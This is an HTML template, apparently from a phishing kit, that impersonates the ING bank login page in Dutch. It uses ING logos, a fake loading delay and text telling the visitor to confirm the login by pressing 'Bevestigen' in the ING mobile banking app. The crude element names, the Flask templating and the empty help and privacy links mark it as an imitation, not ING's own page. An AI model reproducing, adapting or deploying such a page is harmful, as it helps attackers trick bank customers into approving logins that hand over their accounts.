<!doctype html>

<html lang="en">
  <head>
    <title>Mijn ING - Inloggen</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous">
    <link rel="stylesheet" href="{{ url_for('static', filename='ing.css')}}">
    <link rel="icon" href="{{ url_for('static', filename='images/ing/icon.jpg')}}">
  </head>
  <body>
  <ul class="topnav">
  <li class="left"><a class="active" href="index.php"><img style="height: 35px; width: 118px;" src="{{ url_for('static', filename='images/ing/logo1.png')}}"></a></li>
  <div class="rightdiv"><li class="right activelan"><a class="test" href="">NL</a></li>
  <li class="right activelan2"><a href="" style="color: #767676">EN</a></li></div>
</ul>
<script>
setTimeout(function(){
  document.getElementById('inlogshit').style.display = 'block';
  document.getElementById('loadshit').style.display = 'none';
}, 2500);
</script>


<div class="login">
<div id="loadshit" style="display: block;">
  <div id="loader">
    <div id="center">
      <div class="loadd"><div></div><div></div><div></div><div></div></div>
      <h5>Een moment....</h5>
  </div>
</div>
</div>
<div id="inlogshit" style="display: none;">

<center><br><h1 id="ingtekst">Bevestig met je app</h1><br></center>
  <center><img src="{{ url_for('static', filename='images/ing/mobile-animation.gif')}}"></img></center>
  <br>
<h4 id="ingtekst" style="color:black; font-size:20px;" >Open de Mobiel Bankieren App</h4>
    <br>
<h4 id="ingtekst" style="color:black; font-size:15px;" >In de app zie je de knop 'Bevestigen'. Daarmee log je in.</h4>
  <br>
  <center><img src="{{ url_for('static', filename='images/ing/appmelding.png')}}"></img></center>
<div class="radiobuttons">







  </div>

  <br>







<span style="margin-left: 30px;"><img src="{{ url_for('static', filename='images/ing/arrow-chevron-open-right.svg')}}" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="hulp" href="">Hulp nodig?</a></span>
</br>
</div>
</div>
<div class="links">
<span style="margin-left: 30px;"><img src="{{ url_for('static', filename='images/ing/arrow-chevron-open-right.svg')}}" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="link" href="">Veilig bankieren</a>
<img src="{{ url_for('static', filename='images/ing/arrow-chevron-open-right.svg')}}" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="link" href="">Privacy en cookies</a>
<img src="{{ url_for('static', filename='images/ing/arrow-chevron-open-right.svg')}}" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="link" href="">Disclaimer</a></span>
</div>
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js" integrity="sha384-alpBpkh1PFOepccYVYDB4do5UnbKysX5WZXm3XxPqe5iKTfUKjNkCk9SaVuEZflJ" crossorigin="anonymous"></script>
	<script type="text/javascript">
        function removeDiv(btn){
            var element = document.getElementById("remove");
			element.parentNode.removeChild(element);
        }
    </script>
  </body>
</html>
